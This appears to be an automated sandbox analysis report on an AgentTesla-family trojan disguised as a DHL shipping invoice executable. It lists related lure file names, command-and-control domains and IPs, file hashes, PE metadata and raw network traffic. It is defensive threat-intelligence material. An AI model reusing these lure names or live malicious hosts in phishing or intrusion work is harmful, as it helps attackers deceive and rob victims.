                            Classification:mal100.spre.troj.spyw.evad.winEXE@4/4@5/100
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 66
                            • Number of non-executed functions: 12
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 23.200.0.6, 23.200.0.42, 72.21.81.240
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net
                            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing network information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtCreateFile calls found.
                            • Report size getting too big, too many NtDeviceIoControlFile calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            TimeTypeDescription
                            08:36:57API Interceptor77x Sleep call for process: DHL- Shipping invoice.exe modified
                            08:37:14API Interceptor794309x Sleep call for process: RegAsm.exe modified
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            93.171.243.253DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            212.110.188.202PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            PO23656PDFF.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            dl7WL77rkA.exeGet hashmaliciousGlupteba, Mars Stealer, Stealc, VidarBrowse
                            • artemis-rat.comartemis-rat.com:443
                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            Customer's Requirements and Pricing Details.exeGet hashmaliciousAgentTeslaBrowse
                            • artemis-rat.comartemis-rat.com:443
                            HtfOQz42tN.exeGet hashmaliciousUnknownBrowse
                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                            3011574829.exeGet hashmaliciousUnknownBrowse
                            • artemis-rat.comartemis-rat.com:443
                            75C8OqdJUQ.exeGet hashmaliciousUnknownBrowse
                            • heygirlisheeverythingyouwantedinaman.comheygirlisheeverythingyouwantedinaman.com:443
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            artemis-rat.comDHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.140.87
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.140.87
                            RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.140.87
                            copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                            • 172.67.140.87
                            ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                            • 104.21.54.158
                            OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                            • 104.21.54.158
                            ENQUIRY FOR QUOTATION.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            PAYMENT.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            Urgent request for a quote.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            ktxcomay.com.vnDHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                            • 222.255.238.159
                            ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                            • 222.255.238.159
                            OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                            • 222.255.238.159
                            github.comNEW ORDER.jarGet hashmaliciousSTRRATBrowse
                            • 140.82.114.4
                            proof of payment.jsGet hashmaliciousSTRRATBrowse
                            • 140.82.112.3
                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.114.4
                            proof of payment.jsGet hashmaliciousSTRRATBrowse
                            • 140.82.113.4
                            Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.114.3
                            POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.113.4
                            PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.114.3
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.114.3
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.113.4
                            RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 140.82.114.3
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            BYTEMARK-ASGBDHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                            • 212.110.188.207
                            ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                            • 212.110.188.207
                            OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                            • 212.110.188.207
                            OVDC-ASUADHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            DHL DETAILS.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            https://waltondev2.com/c.phpGet hashmaliciousPhisherBrowse
                            • 93.171.243.253
                            SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            PO #1131011152-2024-Order,pdf.exeGet hashmaliciousAgentTeslaBrowse
                            • 93.171.243.253
                            MIDCO-NETUSDHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            Kazeem Engineering and Technical Services.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            POs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            PO-065-01-2024E-2.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            New Orders#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            Payment Invoice.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            RFQ__ PO-7647454645_PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            copia TT allegata.exeGet hashmaliciousAgentTeslaBrowse
                            • 24.230.33.96
                            ADSFDGHJs#U034fx#U034fl#U034fx#U034f..exeGet hashmaliciousFormBookBrowse
                            • 24.230.33.96
                            OUTSTANDING PO.exeGet hashmaliciousFormBookBrowse
                            • 24.230.33.96
                            COGENT-174UScuenta para pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 154.55.135.138
                            fvdsoH9LQneIhQP.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                            • 154.41.240.199
                            https://apicachebot.comGet hashmaliciousUnknownBrowse
                            • 154.29.75.236
                            KY9D34Qh8d.exeGet hashmaliciousUnknownBrowse
                            • 38.12.219.48
                            https://rawhidetravel-my.sharepoint.com/:b:/p/flythis/EUZPkBb9KmVGmVk4U_ULjMwBMNZ8sgSp-pia4eYwz8Clog?e=S3j7o4Get hashmaliciousHTMLPhisherBrowse
                            • 154.62.109.71
                            Transferencia de pago.exeGet hashmaliciousFormBook, GuLoaderBrowse
                            • 154.55.135.138
                            thOKPMihQ6.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 45.9.155.50
                            5jUnZhsgg6.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 206.233.94.101
                            fxJOJAyHO4.elfGet hashmaliciousGafgyt, MiraiBrowse
                            • 149.124.101.7
                            DHL EXPRESS.exeGet hashmaliciousAgentTeslaBrowse
                            • 38.127.179.100
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            3b5074b1b5d032e5620f69f9f700ff0eSIN2400136001370224.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            ENGINE PARTS -KTK (1).vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            Program 2_GDPMD 00172293.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            D00312-24.exeGet hashmaliciousGuLoaderBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            Arrival Notice.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            Purchase Order #98540-00..exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            93GwwLKH1N.exeGet hashmaliciousAmadey, PureLog StealerBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            SecuriteInfo.com.Win64.TrojanX-gen.28133.22494.exeGet hashmaliciousUnknownBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            FinalDraft1010CLEARDETAILSBL00398893PDF.exeGet hashmaliciousAgentTeslaBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=wBHmwVQnaUmzNrqgsumVPty55ek6OhRPiMP6A8WXKRBUOTQzN1pCVFo3OTI5NkFQRFJTSEJSMlE3MC4uGet hashmaliciousUnknownBrowse
                            • 104.21.54.158
                            • 140.82.112.4
                            • 222.255.238.159
                            • 172.67.74.152
                            No context
                            Process:C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69211 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                            Category:dropped
                            Size (bytes):69211
                            Entropy (8bit):7.995787876711886
                            Encrypted:true
                            SSDEEP:1536:4vHkVfDISE//aDY0WAXTF+0daIpyFQaqPZkatNjgkFOE4/JZZWnEn6:4vHKfMSeKFXdBcmnXkksE40E6
                            MD5:753DF6889FD7410A2E9FE333DA83A429
                            SHA1:3C425F16E8267186061DD48AC1C77C122962456E
                            SHA-256:B42DC237E44CBC9A43400E7D3F9CBD406DBDEFD62BFE87328F8663897D69DF78
                            SHA-512:9D56F79410AD0CF852C74C3EF9454E7AE86E80BDD6FF67773994B48CCAC71142BCF5C90635DA6A056E1406E81E64674DB9584928E867C55B77B59E2851CF6444
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:MSCF....[.......,...................I..................WR. .authroot.stl..L...5..CK..<Tk...p.k:.]...k..-.o.d.}.N.F....!.....$t)K."..DE.....v..gr...}?>.<.s..<...{.t..\F.e.F...8&.<..>...t8....`dqM4.y..t8..t..3..1.`\.:+.<].F...3.~.M.B...*..J....PR.+..UUUV.GY...8...._vl.....H}.s.Pq..r.<.0.lG.C..e(..oe........9..'8..m.......G8T......sR..&=.*J....s.U......#...).j...x.....gq.+.N:.Wj...V.t...(J.;^..Mr~e..}.q....q....eo..O.....@.B.S.....66.|!.(.........D!k..&.. /.....H~.....}.(..|.S..~8..A..(.#..w.*Y.....'.F...y&.8......f..49r..N...(zX.0;.....000.3c)Z.v.5N'.z...rNFw,E.NY..#ua.o.$..Y?.-.=....}d.*..]......x_<.W....ya.3.a..SQT.U..|!.pyCA..-h..Y..>n......^.U.....H...EY.\.......}.-(....h..=xiV.O.W@p.=.r.i..c...c....S.x.;..GWf...=.:.....S.c/..v..3.iG<.&..%...8..=}.....+.n\?0"A.Y%<......+..O. .9..#..>.....5.2.j.1<.Z.>v..j...wr.i.:....!...;.N[.q..z9j..l.R.&,....$.V...k.j..Tc..m..D!%....".Y.#V."w.|....L| ..p........w.=..ck...<........{s..w..};../.=...k....YH.
                            Process:C:\Users\user\Desktop\DHL- Shipping invoice.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):330
                            Entropy (8bit):3.1189161461721713
                            Encrypted:false
                            SSDEEP:6:kKZyTN+SkQlPlEGYRMY9z+4KlDA3RUe1HEbpo:U8kPlE99SNxAhUe1HEVo
                            MD5:6E277EBAD23BF90B015A375872D61ABE
                            SHA1:87EC94C530C5115FF30C56F3410C5D6857601779
                            SHA-256:5D08950369C2F34295A22C760C48CFCB0E0D8E13A5FACE0DF199155FD836DBE2
                            SHA-512:A74D6A8C1DE3CB084BC1B02E5EFE198DF6BFDC68293B2F6E474ED056459B6595012B26087792E514D4A9C5E3A9108A985048CDCB4236C33E56153B187036CEEA
                            Malicious:false
                            Reputation:low
                            Preview:p...... .........v..St..(....................................................... .........;.i......(...........[...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".2.c.8.3.b.1.3.b.a.f.6.9.d.a.1.:.0."...
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1835008
                            Entropy (8bit):4.465760312241735
                            Encrypted:false
                            SSDEEP:6144:FIXfpi67eLPU9skLmb0b4TWSPKaJG8nAgejZMMhA2gX4WABl0uNAdwBCswSbJ:mXD94TWlLZMM6YFHe+J
                            MD5:222617A831CE3F408B83E4067942330F
                            SHA1:3F645CCC54336092DF73068199929FE3D3977B2A
                            SHA-256:D4FB02A73B7D4F1730A0A6D0277C2D9406B629419628CC45349571E28A3EC8C9
                            SHA-512:3662E8A12836CAC6FF9155859503AF33D10A5C7BB328E304C95A682C5175196C3545EA69551FFF0F4C78237B84908EC25F83F77A6294C30619C5C1F9698962D9
                            Malicious:false
                            Reputation:low
                            Preview:regf6...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^...Pt...............................................................................................................................................................................................................................................................................................................................................X.,........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:MS Windows registry file, NT/2000 or above
                            Category:dropped
                            Size (bytes):1765376
                            Entropy (8bit):4.580820908775524
                            Encrypted:false
                            SSDEEP:6144:yIXfpi67eLPU9skLmb0b4TWSPDaJG8nAgejZMMhA2gX4WABl0uNAdwBCswSbJ:3XD94TWSLZMM6YFHe+J
                            MD5:3649BF8F61F8975A5B947C0DD6EB8D18
                            SHA1:2EC906359334DC29C96F92532DC449B73B091456
                            SHA-256:E311708600F36C70F7A99C5428D10841C8670995A98D733D0E4345394113A2B0
                            SHA-512:267793D1E3F7339C6EE8A09CD74784F154DA33C66AF71723C736D247CE756AD3C8FE02986FE198E356E801CFB26055CF9A412F56511132A9BC6383067996E42C
                            Malicious:false
                            Reputation:low
                            Preview:regf5...5....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm^...Pt...............................................................................................................................................................................................................................................................................................................................................X.,HvLE........5................D5NlaY.>T.....0...@......hbin.................\.Z............nk,..\.Z........ ...........h...................................<.......&...{11517B7C-E79D-4e20-961B-75A811715ADD}..`...sk..........b...........\...l.............H.........?...................?...................?........... ... ........... ... ...................$.N..........vk..4...`...........CreatingCommand.....O.n.e.D.r.i.v.e.S.e.t.u.p...e.x.e. ./.s.i.l.e.n.t.......vk..<...............
                            File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                            Entropy (8bit):5.84048700724942
                            TrID:
                            • Win64 Executable GUI Net Framework (217006/5) 49.88%
                            • Win64 Executable GUI (202006/5) 46.43%
                            • Win64 Executable (generic) (12005/4) 2.76%
                            • Generic Win/DOS Executable (2004/3) 0.46%
                            • DOS Executable Generic (2002/1) 0.46%
                            File name:DHL- Shipping invoice.exe
                            File size:39'936 bytes
                            MD5:951577b697a1caf07eea6946c91fcd44
                            SHA1:83f57b94040ec26c3841c23d9fa2e3f90a742197
                            SHA256:be1cb45fa4e0e79812640a2b9631da54a8780e0a8e2730baaae76944712f4fd2
                            SHA512:0ed81b5311e6e9ab8cf37d79d3f8ec9479e63feb9a5ccc7c7c8a7f80d414a8837d260900b7b4670e4db5ea9fcd43077c2836d48e15e321c9ecd7bcf52279d07b
                            SSDEEP:768:2Q+04PbQgCw8e49uEKllB/bio/0sMZP9fKWn45SNUS:v+04jQ90d3bio/bgP9TrNX
                            TLSH:D9036B2173A8473BCBEE07F9AC6012001375D6666A43DBEDADC990EE449BBC507523B7
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...I.B..........."...0.....&............ ....@...... ....................................`................................
                            Icon Hash:90cececece8e8eb0
                            Entrypoint:0x400000
                            Entrypoint Section:
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                            Time Stamp:0xAF428149 [Tue Mar 6 01:47:53 2063 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:
                            Instruction
                            dec ebp
                            pop edx
                            nop
                            add byte ptr [ebx], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax], al
                            add byte ptr [eax], al
                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000x626.rsrc
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                            IMAGE_DIRECTORY_ENTRY_DEBUG0xb0e40x38.text
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            .text0x20000x91ba0x9200344058ba9dcdab4c0089163618250eb9False0.5102204623287672data5.957553024858226IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            .rsrc0xc0000x6260x8007ccd95491660fbda3924dbe08f84df33False0.32421875data3.4778778318304995IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                            NameRVASizeTypeLanguageCountryZLIB Complexity
                            RT_VERSION0xc0a00x39cdata0.38852813852813856
                            RT_MANIFEST0xc43c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                            TimestampSource PortDest PortSource IPDest IP
                            Mar 12, 2024 08:36:57.188353062 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.188426018 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.188529968 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.206851959 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.206880093 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.408523083 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.408644915 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.413530111 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.413551092 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.413853884 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.468489885 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.508698940 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.556237936 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.747888088 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748096943 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748162985 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.748193979 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748255968 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.748262882 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748320103 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748373032 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.748402119 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748528957 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.748580933 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.748594046 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.796614885 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.796636105 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841057062 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841137886 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841161966 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841257095 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841305971 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841325045 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841429949 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841481924 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841492891 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841602087 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841661930 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841674089 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841746092 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841808081 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841819048 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841896057 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.841933012 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.841944933 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842024088 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842081070 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.842092037 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842168093 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842231989 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.842241049 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842271090 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.842322111 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.842344999 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.890497923 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.890527010 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.933900118 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.933945894 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.933975935 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934005976 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934036970 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934067965 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934099913 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934129953 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934214115 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.934214115 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.934236050 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934247017 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934294939 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.934300900 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934361935 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934400082 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934401035 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.934410095 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934443951 CET49731443192.168.2.4140.82.112.4
                            Mar 12, 2024 08:36:57.934448004 CET44349731140.82.112.4192.168.2.4
                            Mar 12, 2024 08:36:57.934485912 CET44349731140.82.112.4192.168.2.4
